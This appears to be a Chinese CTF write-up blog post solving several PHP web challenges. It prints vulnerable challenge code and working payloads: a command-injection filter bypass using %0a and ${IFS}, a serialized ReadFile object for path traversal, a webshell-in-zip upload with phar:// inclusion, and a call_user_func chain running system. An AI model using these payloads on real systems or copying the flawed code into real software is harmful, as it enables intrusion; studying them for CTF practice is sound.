# family_md5

爆破 md5

if (substr(MD5($_POST['c']), 0, 5) == 'scphp')

写脚本爆破

<?php
$a = 1;
$b = 0;
while (1)
{
    $b = $a;
    $a = md5($a);
    if (substr($a, 0, 5)  == 'asuej')
    {
        echo $b;
        break;
    }
}

# easy_rce

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>命令注入-综合</title>
</head>
<body>
<h1>命令注入-综合</h1>
<form action="#" method="GET">
    <label for="ip">IP : </label><br>
    <input type="text" id="ip" name="ip">
    <input type="submit" value="Ping">
</form>
<hr>
<pre>
<?php
if ($res) {
    print_r($res);
}
?>
</pre>
<?php
show_source(__FILE__);
?>
</body>
</html>

# 管道符过滤

使用%0a绕过

# 根目录过滤

cd ..  cd .. 一层一层向上

# 空格过滤

${IFS}替换

# cat flag 过滤

反斜杠,引号,通配符都行

# payload

ip=%0acd${IFS}..%0acd${IFS}..%0acd${IFS}..%0atac${IFS}f*

image-20211209214629670

# php 原生类利用

利用 ReadFile 类

O:8:"ReadFile":1:{s:8:"filename";s:16:"../../../../flag";}

image-20211210200225469

# upload_zip

# 源码

<html>
<head>
    <title>上传</title>
</head>
<body>
<!-- ?file=flag.php-->
<form name="form" enctype="multipart/form-data" method="post" action="index.php">
<input type="file" name="file" id="file"></input>
<input type="submit" name="submit" value="上传">
</form>
</body>
</html>
<?php
$F = $_GET['file'];
include($F);
$error=$_FILES['file']['error'];
$tmpName=$_FILES['file']['tmp_name'];
$name=$_FILES['file']['name'];
$size=$_FILES['file']['size'];
$type=$_FILES['file']['type'];
$time=time();
try{
    $name1=substr($name,-4);
if(($name1!==".gif") and ($name1!==".jpg"))
{
    echo "<script language=javascript>alert('上传照片只能是JPG或者GIF!')</script>";
    die("错误");
}
if(mime_content_type($tmpName)!=="image/jpeg"&&mime_content_type($tmpName)!=="image/gif"&&mime_content_type($tmpName)!=="application/zip")
{
    echo mime_content_type($tmpName);
    echo "<script language=javascript>alert('上传照片只能是JPG或者GIF!');</script>";
    die("错误");
}
if(is_uploaded_file($tmpName)){
    $rootpath='uploads/'.$time.$name1;
    if(!move_uploaded_file($tmpName,$rootpath)){
    echo "<script language='JavaScript'>alert('文件移动失败!');</script>";
    die("错误");
    }
}
echo "图片ID:".$time.$name1;
}
catch(Exception $e)
{
    echo "ERROR";
}
?>

# phar:// 文件上传

虽然正常写也行

先写一句话木马,修改成jpg,  然后压缩为zip文件

image-20211210221332298

burp修改后缀为jpg

image-20211210221412894

最后进行文件包含

phar://uploads/1639145426.jpg/1.jpg           (这个1.jpg是压缩文件内部的源文件)

image-20211210221603423

# fake_news

进去就是phpinfo,可以看到php版本为8.1dev

通过user-agentt进行RCE

image-20211210211132108

# ez_code

# 源码

<?php
error_reporting(0);
Class HaHa
{
    private $date = ['hello' => 'welcome'];
    public function __construct($data)
    {
        $this->date = array_merge($this->date, $data);
        extract($this->date);
        $this->listdata("value=list module=$mod");
    }
    public function listdata($_params)
    {
        //var_dump($_params);
        $system =
            [
                'can' => 'oh',
                'you' => 'may',
                'give' => 'be',
                'me' => 'you',
                'a' => 'can',
                'value' => 'do',
                '?' => 'it'
            ];
        $_params = trim($_params);
        $params = explode(' ', $_params);
        if (in_array($params[0], ['list','fuck'])) {
            $params[0] = 'value='.$params[0];
        }
        foreach ($params as $t) {
            $var = substr($t, 0, strpos($t, '='));
            $val = substr($t, strpos($t, '=') + 1);
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) {
                $system[$var] = $val;
            } else {
                $param[$var] = $val;
            }
        }
        switch ($system['value']) {
            case "fuck":
                echo $param['name'];
                call_user_func($param['name'],$param['youfindit']);
                break;
            case 'list':
                return json_encode($this->date);
        }
    }
}
highlight_file(__FILE__);
$HaHa = new HaHa($_POST);

# 找链

image-20211210214743311

就是说, $system['value'] = "fuck"    $param['name'] = system    $param['youfindit'] = "ls"

image-20211210215134332

# 这不给我整个🐎?

# 源码

<?php
highlight_file(__FILE__);
error_reporting(0);
$upload = 'upload/';
if (isset($_POST['file'])) {
    if (preg_match('/htaccess/is', $_POST['file'])) {
        die('?搁这儿干嘛呢?');
    }
    if (preg_match('#\w{2,}|[678]|<\?|/#', $_POST['content'])) {
        die('你这🐎保绿吗???');
    }
    file_put_contents($upload .  $_POST['file'], $_POST['content']);
}

# file_put_contents 特性

请我喝[茶]~( ̄▽ ̄)~*

miku233 微信支付

微信支付

miku233 支付宝

支付宝

miku233 贝宝

贝宝